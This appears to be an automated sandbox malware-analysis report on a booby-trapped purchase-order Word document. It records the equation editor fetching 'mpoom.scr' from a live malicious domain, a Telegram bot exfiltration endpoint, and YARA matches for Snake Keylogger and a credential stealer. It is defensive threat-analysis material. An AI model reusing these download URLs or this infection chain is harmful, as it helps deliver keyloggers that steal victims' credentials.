Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 172.67.134.136:443
Source: global traffic	TCP traffic: 172.67.134.136:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.6.168:80
Source: global traffic	TCP traffic: 193.122.6.168:80 -> 192.168.2.22:49162

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE

Source: Joe Sandbox View

IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET /mpoom.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dukeenergyltd.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{46F363FE-A7DD-406F-B1C8-7F7D7988C666}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /mpoom.scr HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dukeenergyltd.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: dukeenergyltd.top

Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002616000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610871385.0000000002609000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610780471.00000000007ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: mpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.user
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: mpoom39002.scr, 00000006.00000002.610871385.0000000002571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mpoom39002.scr, 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, mpoom39002.scr, 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: EQNEDT32.EXE, 00000002.00000002.344727148.000000000035D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.344727148.0000000000373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/mpoom.scr
Source: EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/mpoom.scrj
Source: EQNEDT32.EXE, 00000002.00000002.344727148.000000000032F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/mpoom.scrjjC:
Source: EQNEDT32.EXE, 00000002.00000002.344727148.0000000000373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dukeenergyltd.top/mpoom.scrsoC:
Source: EQNEDT32.EXE, 00000002.00000002.344727148.00000000003A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown

HTTPS traffic detected: 172.67.134.136:443 -> 192.168.2.22:49161 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.mpoom39002.scr.3253190.5.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.mpoom39002.scr.5f0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 5.2.mpoom39002.scr.221190c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\mpoom39002.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mpoom[1].scr			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0033B860	2_2_0033B860
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0033C0C6	2_2_0033C0C6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_003414C8	2_2_003414C8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0034150D	2_2_0034150D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0033C1E4	2_2_0033C1E4
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 5_2_001E3D30	5_2_001E3D30
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F608D	6_2_001F608D
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001FF128	6_2_001FF128
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001FF9D8	6_2_001FF9D8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F51C1	6_2_001F51C1
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F79F9	6_2_001F79F9
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F6A38	6_2_001F6A38
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F5AB8	6_2_001F5AB8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F72F8	6_2_001F72F8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F3B30	6_2_001F3B30
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001FF580	6_2_001FF580
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F65D9	6_2_001F65D9
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001FBDD9	6_2_001FBDD9
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F4610	6_2_001F4610
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F6E99	6_2_001F6E99
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001F6101	6_2_001F6101
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001FB578	6_2_001FB578
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_001FB568	6_2_001FB568
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FDC38	6_2_003FDC38
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F8228	6_2_003F8228
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F4A18	6_2_003F4A18
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F3008	6_2_003F3008
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F9808	6_2_003F9808
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F4E70	6_2_003F4E70
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F3460	6_2_003F3460
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F9C60	6_2_003F9C60
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F1A50	6_2_003F1A50
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F0040	6_2_003F0040
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FB240	6_2_003FB240
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F38B8	6_2_003F38B8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F1EA8	6_2_003F1EA8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F86A8	6_2_003F86A8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F0498	6_2_003F0498
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FB698	6_2_003FB698
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FE280	6_2_003FE280
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F08F0	6_2_003F08F0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FBAF0	6_2_003FBAF0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F5CE0	6_2_003F5CE0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FA0E0	6_2_003FA0E0
